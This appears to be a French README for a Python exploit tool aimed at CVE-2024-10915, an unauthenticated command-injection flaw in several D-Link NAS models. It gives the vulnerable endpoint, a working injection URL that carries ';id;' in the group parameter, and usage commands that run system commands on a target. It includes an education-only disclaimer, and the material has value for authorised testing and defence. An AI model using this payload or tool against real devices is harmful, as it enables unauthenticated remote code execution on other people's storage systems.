
Cet exploit basé sur Python cible une vulnérabilité d'injection de commandes dans plusieurs produits NAS D-Link via le point de terminaison /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. La vulnérabilité permet à des attaquants non authentifiés d'exécuter des commandes système arbitraires sur l'appareil affecté.
CVE-2024-10915 affecte plusieurs modèles de NAS D-Link. Un attaquant peut injecter des commandes via le paramètre group de la commande cgi_user_add, conduisant à une exécution de code à distance.
D-Link DNS-320
D-Link DNS-320LW
D-Link DNS-325
D-Link DNS-340L
Point de terminaison vulnérable : /cgi-bin/account_mgr.cgi?cmd=cgi_user_add
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'
Python 3.x
bibliothèque requests
Installer les dépendances requises :
pip3 install requests
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt
Ce projet est destiné uniquement à des fins éducatives et de tests autorisés. N'utilisez pas cet outil sur des réseaux ou des systèmes pour lesquels vous ne disposez pas d'une autorisation explicite. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés.
| Option | Description |
|---|
-u / --url | URL de base de la cible (p. ex. http://192.168.1.100) |
-c / --command | Commande à exécuter sur l'appareil (défaut : id) |
-p / --proxy | Utiliser un proxy HTTP (p. ex. http://127.0.0.1:8080) |
-o / --output | Enregistrer la réponse HTTP dans un fichier |
-l / --list | Lister les produits NAS D-Link affectés |